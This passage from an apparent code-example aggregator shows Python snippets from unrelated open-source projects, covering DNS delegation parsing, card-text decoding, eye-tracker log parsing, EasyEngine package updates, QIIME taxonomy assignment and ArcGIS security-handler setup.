IPAddr(mapping + port_str)
except ValueError:
pass
else:
usage('Brackets are required around IPv6 addresses.')
sys.exit(1)
# value is not an address
name = mapping
addr = None
else:
if require_name:
usage('A name is required to accompany the address for this option.')
sys.exit(1)
# value is an address
name = 'ns%d' % i
addr, num_replacements = BRACKETS_RE.subn(r'\1', mapping)
i += 1
else:
# Argument is name=value
addr, num_replacements = BRACKETS_RE.subn(r'\1', addr)
if not name:
usage('The domain name was empty.')
sys.exit(1)
# At this point, name is defined, and addr may or may not be defined.
# Both are of type str.
# Check that the name is valid
try:
name = dns.name.from_text(name)
except dns.exception.DNSException:
usage('The domain name was invalid: "%s"' % name)
sys.exit(1)
# Add the name to the NS RRset
delegation_mapping[(domain, dns.rdatatype.NS)].add(dns.rdtypes.ANY.NS.NS(dns.rdataclass.IN, dns.rdatatype.NS, name))
if addr is None:
if not require_name:
# If no address is provided, query A/AAAA records for the name
query_tuples = ((name, dns.rdatatype.A, dns.rdataclass.IN), (name, dns.rdatatype.AAAA, dns.rdataclass.IN))
answer_map = bootstrap_resolver.query_multiple_for_answer(*query_tuples)
found_answer = False
for (n, rdtype, rdclass) in answer_map:
a = answer_map[(n, rdtype, rdclass)]
if isinstance(a, DNSAnswer):
found_answer = True
delegation_mapping[(name, rdtype)] = dns.rrset.from_text_list(name, 0, dns.rdataclass.IN, rdtype, [IPAddr(r.address) for r in a.rrset])
if port != 53:
for r in a.rrset:
odd_ports[(domain, IPAddr(r.address))] = port
# negative responses
elif isinstance(a, (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer)):
pass
# error responses
elif isinstance(a, (dns.exception.Timeout, dns.resolver.NoNameservers)):
usage('There was an error resolving "%s". Please specify an address or use a name that resolves properly.' % fmt.humanize_name(name))
sys.exit(1)
if not found_answer:
usage('"%s" did not resolve to an address. Please specify an address or use a name that resolves properly.' % fmt.humanize_name(name))
sys.exit(1)
elif not addr:
if not require_name:
usage('The IP address was empty.')
sys.exit(1)
else:
try:
IPAddr(addr)
except ValueError:
# see if this was an IPv6 address without a port
try:
IPAddr(addr + port_str)
except ValueError:
usage('The IP address was invalid: "%s"' % addr)
sys.exit(1)
else:
usage('Brackets are required around IPv6 addresses.')
sys.exit(1)
if IPAddr(addr).version == 6:
if num_replacements < 1:
usage('Brackets are required around IPv6 addresses.')
sys.exit(1)
a_rdtype = dns.rdatatype.AAAA
rdtype_cls = dns.rdtypes.IN.AAAA.AAAA
else:
a_rdtype = dns.rdatatype.A
rdtype_cls = dns.rdtypes.IN.A.A
if (name, a_rdtype) not in delegation_mapping:
delegation_mapping[(name, a_rdtype)] = dns.rrset.RRset(name, dns.rdataclass.IN, a_rdtype)
delegation_mapping[(name, a_rdtype)].add(rdtype_cls(dns.rdataclass.IN, a_rdtype, addr))
if port != 53:
odd_ports[(domain, IPAddr(addr))] = port
0
Example 75
Project: mtgencode Source File: decode.py
def main(fname, oname = None, verbose = True, encoding = 'std',
gatherer = False, for_forum = False, for_mse = False,
creativity = False, vdump = False, for_html = False):
# there is a sane thing to do here (namely, produce both at the same time)
# but we don't support it yet.
if for_mse and for_html:
print 'ERROR - decode.py - incompatible formats "mse" and "html"'
return
fmt_ordered = cardlib.fmt_ordered_default
if encoding in ['std']:
pass
elif encoding in ['named']:
fmt_ordered = cardlib.fmt_ordered_named
elif encoding in ['noname']:
fmt_ordered = cardlib.fmt_ordered_noname
elif encoding in ['rfields']:
pass
elif encoding in ['old']:
fmt_ordered = cardlib.fmt_ordered_old
elif encoding in ['norarity']:
fmt_ordered = cardlib.fmt_ordered_norarity
elif encoding in ['vec']:
pass
elif encoding in ['custom']:
## put custom format decisions here ##########################
## end of custom format ######################################
pass
else:
raise ValueError('encode.py: unknown encoding: ' + encoding)
cards = jdecode.mtg_open_file(fname, verbose=verbose, fmt_ordered=fmt_ordered)
if creativity:
namediff = Namediff()
cbow = CBOW()
if verbose:
print 'Computing nearest names...'
nearest_names = namediff.nearest_par(map(lambda c: c.name, cards), n=3)
if verbose:
print 'Computing nearest cards...'
nearest_cards = cbow.nearest_par(cards)
for i in range(0, len(cards)):
cards[i].nearest_names = nearest_names[i]
cards[i].nearest_cards = nearest_cards[i]
if verbose:
print '...Done.'
def hoverimg(cardname, dist, nd):
truename = nd.names[cardname]
code = nd.codes[cardname]
namestr = ''
if for_html:
if code:
namestr = ('<div class="hover_img"><a href="#">' + truename
+ '<span><img style="background: url(http://magiccards.info/scans/en/' + code
+ ');" alt=""/></span></a>' + ': ' + str(dist) + '\n</div>\n')
else:
namestr = '<div>' + truename + ': ' + str(dist) + '</div>'
elif for_forum:
namestr = '[card]' + truename + '[/card]' + ': ' + str(dist) + '\n'
else:
namestr = truename + ': ' + str(dist) + '\n'
return namestr
def writecards(writer):
if for_mse:
# have to prepend a massive chunk of formatting info
writer.write(utils.mse_prepend)
if for_html:
# have to preapend html info
writer.write(utils.html_prepend)
# seperate the write function to allow for writing smaller chunks of cards at a time
segments = sort_colors(cards)
for i in range(len(segments)):
# sort color by CMC
segments[i] = sort_type(segments[i])
# this allows card boxes to be colored for each color
# for coloring of each box seperately cardlib.Card.format() must change non-minimaly
writer.write('<div id="' + utils.segment_ids[i] + '">')
writehtml(writer, segments[i])
writer.write("</div><hr>")
# closing the html file
writer.write(utils.html_append)
return #break out of the write cards funcrion to avoid writing cards twice
for card in cards:
if for_mse:
writer.write(card.to_mse().encode('utf-8'))
fstring = ''
if card.json:
fstring += 'JSON:\n' + card.json + '\n'
if card.raw:
fstring += 'raw:\n' + card.raw + '\n'
fstring += '\n'
fstring += card.format(gatherer = gatherer, for_forum = for_forum,
vdump = vdump) + '\n'
fstring = fstring.replace('<', '(').replace('>', ')')
writer.write(('\n' + fstring[:-1]).replace('\n', '\n\t\t'))
else:
fstring = card.format(gatherer = gatherer, for_forum = for_forum,
vdump = vdump, for_html = for_html)
writer.write((fstring + '\n').encode('utf-8'))
if creativity:
cstring = '~~ closest cards ~~\n'
nearest = card.nearest_cards
for dist, cardname in nearest:
cstring += hoverimg(cardname, dist, namediff)
cstring += '~~ closest names ~~\n'
nearest = card.nearest_names
for dist, cardname in nearest:
cstring += hoverimg(cardname, dist, namediff)
if for_mse:
cstring = ('\n\n' + cstring[:-1]).replace('\n', '\n\t\t')
writer.write(cstring.encode('utf-8'))
writer.write('\n'.encode('utf-8'))
if for_mse:
# more formatting info
writer.write('version control:\n\ttype: none\napprentice code: ')
def writehtml(writer, card_set):
for card in card_set:
fstring = card.format(gatherer = gatherer, for_forum = True,
vdump = vdump, for_html = for_html)
if creativity:
fstring = fstring[:-6] # chop off the closing </div> to stick stuff in
writer.write((fstring + '\n').encode('utf-8'))
if creativity:
cstring = '~~ closest cards ~~\n<br>\n'
nearest = card.nearest_cards
for dist, cardname in nearest:
cstring += hoverimg(cardname, dist, namediff)
cstring += "<br>\n"
cstring += '~~ closest names ~~\n<br>\n'
nearest = card.nearest_names
for dist, cardname in nearest:
cstring += hoverimg(cardname, dist, namediff)
cstring = '<hr><div>' + cstring + '</div>\n</div>'
writer.write(cstring.encode('utf-8'))
writer.write('\n'.encode('utf-8'))
# Sorting by colors
def sort_colors(card_set):
# Initialize sections
red_cards = []
blue_cards = []
green_cards = []
black_cards = []
white_cards = []
multi_cards = []
colorless_cards = []
lands = []
for card in card_set:
if len(card.get_colors())>1:
multi_cards += [card]
continue
if 'R' in card.get_colors():
red_cards += [card]
continue
elif 'U' in card.get_colors():
blue_cards += [card]
continue
elif 'B' in card.get_colors():
black_cards += [card]
continue
elif 'G' in card.get_colors():
green_cards += [card]
continue
elif 'W' in card.get_colors():
white_cards += [card]
continue
else:
if "land" in card.get_types():
lands += [card]
continue
colorless_cards += [card]
return[white_cards, blue_cards, black_cards, red_cards, green_cards, multi_cards, colorless_cards, lands]
def sort_type(card_set):
sorting = ["creature", "enchantment", "instant", "sorcery", "artifact", "planeswalker"]
sorted_cards = [[],[],[],[],[],[],[]]
sorted_set = []
for card in card_set:
types = card.get_types()
for i in range(len(sorting)):
if sorting[i] in types:
sorted_cards[i] += [card]
break
else:
sorted_cards[6] += [card]
for value in sorted_cards:
for card in value:
sorted_set += [card]
return sorted_set
def sort_cmc(card_set):
sorted_cards = []
sorted_set = []
for card in card_set:
# make sure there is an empty set for each CMC
while len(sorted_cards)-1 < card.get_cmc():
sorted_cards += [[]]
# add card to correct set of CMC values
sorted_cards[card.get_cmc()] += [card]
# combine each set of CMC valued cards together
for value in sorted_cards:
for card in value:
sorted_set += [card]
return sorted_set
if oname:
if for_html:
print oname
# if ('.html' != oname[-])
# oname += '.html'
if verbose:
print 'Writing output to: ' + oname
with open(oname, 'w') as ofile:
writecards(ofile)
if for_mse:
# Copy whatever output file is produced, name the copy 'set' (yes, no extension).
if os.path.isfile('set'):
print 'ERROR: tried to overwrite existing file "set" - aborting.'
return
shutil.copyfile(oname, 'set')
# Use the freaky mse extension instead of zip.
with zipfile.ZipFile(oname+'.mse-set', mode='w') as zf:
try:
# Zip up the set file into oname.mse-set.
zf.write('set')
finally:
if verbose:
print 'Made an MSE set file called ' + oname + '.mse-set.'
# The set file is useless outside the .mse-set, delete it.
os.remove('set')
else:
writecards(sys.stdout)
sys.stdout.flush()
0
Example 76
Project: PyGazeAnalyser Source File: eyetribereader.py
def read_eyetribe(filename, start, stop=None, missing=0.0, debug=False):
"""Returns a list with dicts for every trial. A trial dict contains the
following keys:
x - numpy array of x positions
y - numpy array of y positions
size - numpy array of pupil size
time - numpy array of timestamps, t=0 at trialstart
trackertime- numpy array of timestamps, according to the tracker
events - dict with the following keys:
Sfix - list of lists, each containing [starttime]
Ssac - EMPTY! list of lists, each containing [starttime]
Sblk - list of lists, each containing [starttime]
Efix - list of lists, each containing [starttime, endtime, duration, endx, endy]
Esac - EMPTY! list of lists, each containing [starttime, endtime, duration, startx, starty, endx, endy]
Eblk - list of lists, each containing [starttime, endtime, duration]
msg - list of lists, each containing [time, message]
NOTE: timing is in EyeTribe time!
arguments
filename - path to the file that has to be read
start - trial start string
keyword arguments
stop - trial ending string (default = None)
missing - value to be used for missing data (default = 0.0)
debug - Boolean indicating if DEBUG mode should be on or off;
if DEBUG mode is on, information on what the script
currently is doing will be printed to the console
(default = False)
returns
data - a list with a dict for every trial (see above)
"""
# # # # #
# debug mode
if debug:
def message(msg):
print(msg)
else:
def message(msg):
pass
# # # # #
# file handling
# check if the file exists
if os.path.isfile(filename):
# open file
message("opening file '%s'" % filename)
f = open(filename, 'r')
# raise exception if the file does not exist
else:
raise Exception("Error in read_eyetribe: file '%s' does not exist" % filename)
# read file contents
message("reading file '%s'" % filename)
raw = f.readlines()
# close file
message("closing file '%s'" % filename)
f.close()
# # # # #
# parse lines
# variables
data = []
x = []
y = []
size = []
time = []
trackertime = []
events = {'Sfix':[],'Ssac':[],'Sblk':[],'Efix':[],'Esac':[],'Eblk':[],'msg':[]}
starttime = 0
started = False
trialend = False
# loop through all lines
for i in range(len(raw)):
# string to list
line = raw[i].replace('\n','').replace('\r','').split('\t')
# check if trial has already started
if started:
# only check for stop if there is one
if stop != None:
if (line[0] == 'MSG' and stop in line[3]) or i == len(raw)-1:
started = False
trialend = True
# check for new start otherwise
else:
if start in line or i == len(raw)-1:
started = True
trialend = True
# # # # #
# trial ending
if trialend:
message("trialend %d; %d samples found" % (len(data),len(x)))
# trial dict
trial = {}
trial['x'] = numpy.array(x)
trial['y'] = numpy.array(y)
trial['size'] = numpy.array(size)
trial['time'] = numpy.array(time)
trial['trackertime'] = numpy.array(trackertime)
trial['events'] = copy.deepcopy(events)
# events
trial['events']['Sblk'], trial['events']['Eblk'] = blink_detection(trial['x'],trial['y'],trial['trackertime'],missing=missing)
trial['events']['Sfix'], trial['events']['Efix'] = fixation_detection(trial['x'],trial['y'],trial['trackertime'],missing=missing)
trial['events']['Ssac'], trial['events']['Esac'] = saccade_detection(trial['x'],trial['y'],trial['trackertime'],missing=missing)
# add trial to data
data.append(trial)
# reset stuff
x = []
y = []
size = []
time = []
trackertime = []
events = {'Sfix':[],'Ssac':[],'Sblk':[],'Efix':[],'Esac':[],'Eblk':[],'msg':[]}
trialend = False
# check if the current line contains start message
else:
if line[0] == "MSG":
if start in line[3]:
message("trialstart %d" % len(data))
# set started to True
started = True
# find starting time
starttime = int(line[2])
# # # # #
# parse line
if started:
# message lines will start with MSG, followed by a tab, then a
# timestamp, a tab, the time, a tab and the message, e.g.:
# "MSG\t2014-07-01 17:02:33.770\t853589802\tsomething of importance here"
if line[0] == "MSG":
t = int(line[2]) # time
m = line[3] # message
events['msg'].append([t,m])
# regular lines will contain tab separated values, beginning with
# a timestamp, follwed by the values that were asked to be stored
# in the data file. Usually, this comes down to
# timestamp, time, fix, state, rawx, rawy, avgx, avgy, psize,
# Lrawx, Lrawy, Lavgx, Lavgy, Lpsize, Lpupilx, Lpupily,
# Rrawx, Rrawy, Ravgx, Ravgy, Rpsize, Rpupilx, Rpupily
# e.g.:
# '2014-07-01 17:02:33.770, 853589802, False, 7, 512.5897, 510.8104, 614.6975, 614.3327, 16.8657,
# 523.3592, 475.2756, 511.1529, 492.7412, 16.9398, 0.4037, 0.5209,
# 501.8202, 546.3453, 609.3405, 623.2287, 16.7916, 0.5539, 0.5209'
else:
# see if current line contains relevant data
try:
# extract data
x.append(float(line[6]))
y.append(float(line[7]))
size.append(float(line[8]))
time.append(int(line[1])-starttime)
trackertime.append(int(line[1]))
except:
message("line '%s' could not be parsed" % line)
continue # skip this line
# # # # #
# return
return data
0
Example 77
@expose(hide=True)
def default(self):
# All package update
if ((not self.app.pargs.php56)):
apt_packages = []
packages = []
if ((not self.app.pargs.web) and (not self.app.pargs.nginx) and
(not self.app.pargs.php) and (not self.app.pargs.mysql) and
(not self.app.pargs.postfix) and (not self.app.pargs.hhvm) and
(not self.app.pargs.mailscanner) and (not self.app.pargs.all)
and (not self.app.pargs.wpcli) and (not self.app.pargs.redis) and (not self.app.pargs.nginxmainline)):
self.app.pargs.web = True
if self.app.pargs.all:
self.app.pargs.web = True
self.app.pargs.mail = True
if self.app.pargs.web:
if EEAptGet.is_installed(self, 'nginx-custom'):
self.app.pargs.nginx = True
else:
Log.info(self, "Nginx is not already installed")
self.app.pargs.php = True
self.app.pargs.mysql = True
self.app.pargs.postfix = True
self.app.pargs.wpcli = True
if self.app.pargs.mail:
self.app.pargs.nginx = True
self.app.pargs.php = True
self.app.pargs.mysql = True
self.app.pargs.wpcli = True
self.app.pargs.postfix = True
if EEAptGet.is_installed(self, 'dovecot-core'):
apt_packages = apt_packages + EEVariables.ee_mail
self.app.pargs.mailscanner = True
else:
Log.info(self, "Mail server is not installed")
if self.app.pargs.nginx :
if EEAptGet.is_installed(self, 'nginx-custom'):
apt_packages = apt_packages + EEVariables.ee_nginx
else:
Log.info(self, "Nginx Stable is not already installed")
if self.app.pargs.php:
if (EEVariables.ee_platform_distro == 'debian' or EEVariables.ee_platform_codename == 'precise'):
if EEAptGet.is_installed(self, 'php5-fpm'):
apt_packages = apt_packages + EEVariables.ee_php
else:
Log.info(self, "PHP is not installed")
if EEAptGet.is_installed(self, 'php7.0-fpm'):
apt_packages = apt_packages + EEVariables.ee_php7_0
else:
if EEAptGet.is_installed(self, 'php5.6-fpm'):
apt_packages = apt_packages + EEVariables.ee_php5_6 + EEVariables.ee_php_extra
else:
Log.info(self, "PHP 5.6 is not installed")
if EEAptGet.is_installed(self, 'php7.0-fpm'):
apt_packages = apt_packages + EEVariables.ee_php7_0 + EEVariables.ee_php_extra
else:
Log.info(self, "PHP 7.0 is not installed")
if self.app.pargs.hhvm:
if EEAptGet.is_installed(self, 'hhvm'):
apt_packages = apt_packages + EEVariables.ee_hhvm
else:
Log.info(self, "HHVM is not installed")
if self.app.pargs.mysql:
if EEAptGet.is_installed(self, 'mariadb-server'):
apt_packages = apt_packages + EEVariables.ee_mysql
else:
Log.info(self, "MariaDB is not installed")
if self.app.pargs.postfix:
if EEAptGet.is_installed(self, 'postfix'):
apt_packages = apt_packages + EEVariables.ee_postfix
else:
Log.info(self, "Postfix is not installed")
if self.app.pargs.redis:
if EEAptGet.is_installed(self, 'redis-server'):
apt_packages = apt_packages + EEVariables.ee_redis
else:
Log.info(self, "Redis is not installed")
if self.app.pargs.wpcli:
if os.path.isfile('/usr/bin/wp'):
packages = packages + [["https://github.com/wp-cli/wp-cli/"
"releases/download/v{0}/"
"wp-cli-{0}.phar"
"".format(EEVariables.ee_wp_cli),
"/usr/bin/wp",
"WP-CLI"]]
else:
Log.info(self, "WPCLI is not installed with EasyEngine")
if self.app.pargs.mailscanner:
if EEAptGet.is_installed(self, 'amavisd-new'):
apt_packages = (apt_packages + EEVariables.ee_mailscanner)
else:
Log.info(self, "MailScanner is not installed")
if len(packages) or len(apt_packages):
Log.info(self, "During package update process non nginx-cached"
" parts of your site may remain down")
# Check prompt
if (not self.app.pargs.no_prompt):
start_upgrade = input("Do you want to continue:[y/N]")
if start_upgrade != "Y" and start_upgrade != "y":
Log.error(self, "Not starting package update")
Log.info(self, "Updating packages, please wait...")
if len(apt_packages):
# apt-get update
EEAptGet.update(self)
# Update packages
EEAptGet.install(self, apt_packages)
# Post Actions after package updates
if (set(EEVariables.ee_nginx).issubset(set(apt_packages))):
EEService.restart_service(self, 'nginx')
if (EEVariables.ee_platform_distro == 'debian' or EEVariables.ee_platform_codename == 'precise'):
if set(EEVariables.ee_php).issubset(set(apt_packages)):
EEService.restart_service(self, 'php5-fpm')
else:
if set(EEVariables.ee_php5_6).issubset(set(apt_packages)):
EEService.restart_service(self, 'php5.6-fpm')
if set(EEVariables.ee_php7_0).issubset(set(apt_packages)):
EEService.restart_service(self, 'php7.0-fpm')
if set(EEVariables.ee_hhvm).issubset(set(apt_packages)):
EEService.restart_service(self, 'hhvm')
if set(EEVariables.ee_postfix).issubset(set(apt_packages)):
EEService.restart_service(self, 'postfix')
if set(EEVariables.ee_mysql).issubset(set(apt_packages)):
EEService.restart_service(self, 'mysql')
if set(EEVariables.ee_mail).issubset(set(apt_packages)):
EEService.restart_service(self, 'dovecot')
if set(EEVariables.ee_redis).issubset(set(apt_packages)):
EEService.restart_service(self, 'redis-server')
if len(packages):
if self.app.pargs.wpcli:
EEFileUtils.remove(self,['/usr/bin/wp'])
Log.debug(self, "Downloading following: {0}".format(packages))
EEDownload.download(self, packages)
if self.app.pargs.wpcli:
EEFileUtils.chmod(self, "/usr/bin/wp", 0o775)
Log.info(self, "Successfully updated packages")
# PHP 5.6 to 5.6
elif (self.app.pargs.php56):
self.upgrade_php56()
else:
self.app.args.print_help()
0
Example 78
Project: qiime Source File: assign_taxonomy.py
def main():
option_parser, opts, args = parse_command_line_parameters(**script_info)
assignment_method = opts.assignment_method
similarity = opts.similarity
sortmerna_coverage = opts.sortmerna_coverage
sortmerna_db = opts.sortmerna_db
if assignment_method == 'sortmerna':
# similarity must be between (0,1]
if not 0 < similarity <= 1:
option_parser.error('--similarity must be between (0,1].')
# coverage must be between (0.1]
if not 0 < sortmerna_coverage <= 1:
option_parser.error('--sortmerna_coverage must be '
'between (0,1].')
# check ID to taxonomy filepath
if not opts.id_to_taxonomy_fp:
option_parser.error('--id_to_taxonomy_fp is required when '
'assigning with sortmerna.')
# check reference sequences filepath
if not opts.reference_seqs_fp:
option_parser.error('sortmerna always requires --reference_seqs_fp '
'(with or without sortmerna_db)')
# check indexed database, if provided (not mandatory)
elif sortmerna_db:
if isfile(sortmerna_db + '.stats') is False:
option_parser.error('%s does not exist, make sure you have '
'indexed the database using indexdb_rna' %
(sortmerna_db + '.stats'))
if assignment_method == 'blast':
if not opts.id_to_taxonomy_fp:
option_parser.error('--id_to_taxonomy_fp is required when '
'assigning with blast.')
if not (opts.reference_seqs_fp or opts.blast_db):
option_parser.error('Either a blast db (via -b) or a collection '
'of reference sequences (via -r) must be '
'passed to assign taxonomy using blast.')
if assignment_method == 'rdp':
try:
validate_rdp_version()
except RuntimeError as e:
option_parser.error(e)
if opts.id_to_taxonomy_fp is not None:
if opts.reference_seqs_fp is None:
option_parser.error(
'A filepath for reference sequences must be '
'specified (via -r) along with the id_to_taxonomy '
'file to train the Rdp Classifier.')
elif opts.reference_seqs_fp is not None:
option_parser.error(
'A filepath for an id to taxonomy map must be '
'specified (via -t) along with the reference '
'sequences fp to train the Rdp Classifier.')
else:
pass
if assignment_method == 'uclust':
if opts.id_to_taxonomy_fp is None:
option_parser.error('--id_to_taxonomy_fp is required when '
'assigning with uclust.')
if opts.reference_seqs_fp is None:
option_parser.error('--reference_seqs_fp is required when '
'assigning with uclust.')
if assignment_method == 'rtax':
if opts.id_to_taxonomy_fp is None or opts.reference_seqs_fp is None:
option_parser.error('RTAX classification requires both a filepath for '
'reference sequences (via -r) and an id_to_taxonomy '
'file (via -t).')
if opts.read_1_seqs_fp is None: # or opts.read_2_seqs_fp is None:
option_parser.error('RTAX classification requires the FASTA files '
'produced by split_illumina_fastq.py for both reads, '
'in addition to the cluster representatives. Pass '
'these via --read_1_seqs_fp and --read_2_seqs_fp.')
if assignment_method == 'mothur':
if None in [opts.id_to_taxonomy_fp, opts.reference_seqs_fp]:
option_parser.error(
'Mothur classification requires both a filepath for '
'reference sequences (via -r) and an id_to_taxonomy '
'file (via -t).')
taxon_assigner_constructor =\
assignment_method_constructors[assignment_method]
input_sequences_filepath = opts.input_fasta_fp
try:
id_to_taxonomy_fp = opts.id_to_taxonomy_fp
params = {'id_to_taxonomy_filepath': id_to_taxonomy_fp}
except IndexError:
params = {}
# Build the output filenames
output_dir = opts.output_dir or assignment_method + '_assigned_taxonomy'
try:
mkdir(output_dir)
except OSError:
# output_dir already exists
pass
fpath, ext = splitext(input_sequences_filepath)
input_dir, fname = split(fpath)
result_path = output_dir + '/' + fname + '_tax_assignments.txt'
log_path = output_dir + '/' + fname + '_tax_assignments.log'
if assignment_method == 'blast':
# one of these must have a value, otherwise we'd have
# an optparse error
if opts.blast_db:
params['blast_db'] = opts.blast_db
else:
params['reference_seqs_filepath'] = opts.reference_seqs_fp
params['Max E value'] = opts.blast_e_value
elif assignment_method == 'mothur':
params['Confidence'] = opts.confidence
params['id_to_taxonomy_fp'] = opts.id_to_taxonomy_fp
params['reference_sequences_fp'] = opts.reference_seqs_fp
elif assignment_method == 'uclust':
params['id_to_taxonomy_fp'] = opts.id_to_taxonomy_fp
params['reference_sequences_fp'] = opts.reference_seqs_fp
params['min_consensus_fraction'] = opts.min_consensus_fraction
params['similarity'] = similarity
params['max_accepts'] = opts.uclust_max_accepts
elif assignment_method == 'sortmerna':
params['id_to_taxonomy_fp'] = opts.id_to_taxonomy_fp
params['reference_sequences_fp'] = opts.reference_seqs_fp
params['sortmerna_db'] = sortmerna_db
params['min_consensus_fraction'] = opts.min_consensus_fraction
params['min_percent_id'] = float(similarity*100.0)
params['min_percent_cov'] = float(sortmerna_coverage*100.0)
params['best_N_alignments'] = opts.sortmerna_best_N_alignments
params['e_value'] = opts.sortmerna_e_value
params['threads'] = opts.sortmerna_threads
elif assignment_method == 'rdp':
params['Confidence'] = opts.confidence
params['id_to_taxonomy_fp'] = opts.id_to_taxonomy_fp
params['reference_sequences_fp'] = opts.reference_seqs_fp
params[
'training_data_properties_fp'] = opts.training_data_properties_fp
params['max_memory'] = "%sM" % opts.rdp_max_memory
elif assignment_method == 'rtax':
params['id_to_taxonomy_fp'] = opts.id_to_taxonomy_fp
params['reference_sequences_fp'] = opts.reference_seqs_fp
params['read_1_seqs_fp'] = opts.read_1_seqs_fp
params['read_2_seqs_fp'] = opts.read_2_seqs_fp
params['single_ok'] = opts.single_ok
params['no_single_ok_generic'] = opts.no_single_ok_generic
params['header_id_regex'] = opts.header_id_regex
params['read_id_regex'] = opts.read_id_regex
params['amplicon_id_regex'] = opts.amplicon_id_regex
else:
# should not be able to get here as an unknown classifier would
# have raised an optparse error
exit(1)
fd, temp_result_path = mkstemp(prefix='assign-tax')
close(fd)
taxon_assigner = taxon_assigner_constructor(params)
if assignment_method == "sortmerna":
taxon_assigner(input_sequences_filepath,
result_path=result_path,
log_path=log_path)
else:
taxon_assigner(input_sequences_filepath,
result_path=temp_result_path,
log_path=log_path)
# This is an ugly hack, and needs to be pushed upstream to
# the taxon assigners (except for sortmerna, which already outputs
# only the first field for all headers in the Blast tabular output).
# The output taxonomy maps that are returned by the taxon assigners
# contain the full sequence headers as the first field (so including
# "comment" text in the fasta headers), but for consistency with the
# input taxonomy maps, should only contain the sequence identifier.
# This modifies those entries to contain only the sequence identifer,
# discarding any comment information. The formatting of these result
# files needs to be centralized, and at that stage this processing
# should happen there rather than here.
result_f = open(result_path, 'w')
for line in open(temp_result_path, 'U'):
fields = line.strip().split('\t')
seq_id = fields[0].split()[0]
result_f.write('%s\t%s\n' % (seq_id, '\t'.join(fields[1:])))
result_f.close()
remove_files([temp_result_path])
0
Example 79
Project: executive-dashboard Source File: securityhandlerhelper.py
def __init__(self, securityinfo):
"""Constructor"""
try:
if not securityinfo is None:
if isinstance(securityinfo,securityhandlerhelper):
self._securityHandler = securityinfo.securityhandler
self._username = securityinfo._username
self._password = securityinfo._password
self._proxy_url = securityinfo._proxy_url
self._proxy_port = securityinfo._proxy_port
self._token_url = securityinfo._token_url
self._security_type = securityinfo._security_type
self._featureServiceFieldCase = securityinfo._featureServiceFieldCase
self._keyfile = securityinfo._keyfile
self._certificatefile = securityinfo._certificatefile
self._referer_url = securityinfo._referer_url
self._client_id = securityinfo._client_id
self._secret_id = securityinfo._secret_id
self._is_portal = securityinfo._is_portal
self._message = securityinfo._message
self._valid = securityinfo._valid
#self._securityHandler = securityinfo
return
else:
pass
if isinstance(securityinfo,str) and os.path.isfile(securityinfo):
securityinfo = common.init_config_json(config_file=securityinfo)
if 'Credentials' in securityinfo:
securityinfo = securityinfo['Credentials']
if 'security_type' in securityinfo:
self._security_type = securityinfo['security_type']
else:
self._security_type = 'Portal'
if not any(self._security_type in s for s in self._supported_types):
self._message = 'Security type not supported: ' + self._security_type
self._valid = False
return
if 'proxy_url' in securityinfo:
self._proxy_url = securityinfo['proxy_url']
if 'proxy_port' in securityinfo:
self._proxy_port = securityinfo['proxy_port']
if 'referer_url' in securityinfo:
self._referer_url = securityinfo['referer_url']
if 'token_url' in securityinfo and securityinfo['token_url'] is not None:
self._token_url = securityinfo['token_url']
if not self._token_url.startswith('http://') and \
not self._token_url.startswith('https://'):
self._token_url = 'https://' + self._token_url
if 'org_url' in securityinfo and securityinfo['org_url'] is not None:
self._org_url = securityinfo['org_url']
if not self._org_url.startswith('http://') and not self._org_url.startswith('https://'):
self._org_url = 'http://' + self._org_url
if 'username' in securityinfo:
self._username = securityinfo['username']
if 'password' in securityinfo:
self._password = securityinfo['password']
if 'certificatefile' in securityinfo:
self._certificatefile = securityinfo['certificatefile']
if 'keyfile' in securityinfo:
self._keyfile = securityinfo['keyfile']
if 'client_id' in securityinfo:
self._client_id = securityinfo['client_id']
if 'secret_id' in securityinfo:
self._secret_id = securityinfo['secret_id']
if str(self._security_type).upper() == 'ArcGIS'.upper():
self._securityHandler = security.ArcGISTokenSecurityHandler(proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
self._org_url = self._securityHandler.org_url
self._username = self._securityHandler.username
self._valid = True
self._message = "ArcGIS security handler created"
elif str(self._security_type).upper() == 'Portal'.upper() or \
str(self._security_type).upper() == 'AGOL'.upper():
if self._org_url is None or self._org_url == '':
self._org_url = 'http://www.arcgis.com'
if self._username is None or self._username == '' or \
self._password is None or self._password == '':
self._message = "No username or password, no security handler generated"
self._valid = True
else:
if self._org_url is None or '.arcgis.com' in self._org_url:
self._securityHandler = security.AGOLTokenSecurityHandler(username=self._username,
password=self._password,
org_url=self._org_url,
token_url=self._token_url,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
self._org_url = self._securityHandler.org_url
self._message = "ArcGIS Online security handler created"
else:
self._securityHandler = security.PortalTokenSecurityHandler(username=self._username,
password=self._password,
org_url=self._org_url,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
self._message = "Portal security handler created"
elif str(self._security_type).upper() == 'NTLM'.upper():
if self._username is None or self._username == '' or \
self._password is None or self._password == '':
self._message = "Username and password required for NTLM"
self._valid = False
else:
self._securityHandler = security.NTLMSecurityHandler(username=self._username,
password=self._password,
org_url=self._org_url,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port,
referer_url=self._referer_url)
self._message = "NTLM security handler created"
elif str(self._security_type).upper() == 'LDAP'.upper():
if self._username is None or self._username == '' or \
self._password is None or self._password == '':
self._message = "Username and password required for LDAP"
self._valid = False
else:
self._securityHandler = security.LDAPSecurityHandler(username=self._username,
password=self._password,
org_url=self._org_url,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port,
referer_url=self._referer_url)
self._message = "LDAP security handler created"
elif str(self._security_type).upper() == 'PKI'.upper():
if self._keyfile is None or self._keyfile == '' or \
self._certificatefile is None or self._certificatefile == '':
self._message = "Key file and certification file required for PKI"
self._valid = False
else:
self._securityHandler = security.PKISecurityHandler(keyfile = self._keyfile,
certificatefile = self._certificatefile,
org_url=self._org_url,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port,
referer_url=self._referer_url)
self._message = "PKI security handler created"
elif str(securityinfo['security_type']).upper() == 'OAUTH'.upper():
if self._secret_id is None or self._secret_id == '' or \
self._client_id is None or self._client_id == '':
self._message = "client_id and secret_id required for OAUTH"
self._valid = False
else:
self._securityHandler = security.OAuthSecurityHandler(client_id=self._client_id,
secret_id = self._secret_id,
org_url=self._org_url,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
self._message = "OAuth security handler created"
else:
print ("No valid security type set")
self._message = "No valid security type set"
if self._securityHandler is not None:
admin = Administration(url=self._org_url,
securityHandler=self._securityHandler)
try:
portal = admin.portals.portalSelf
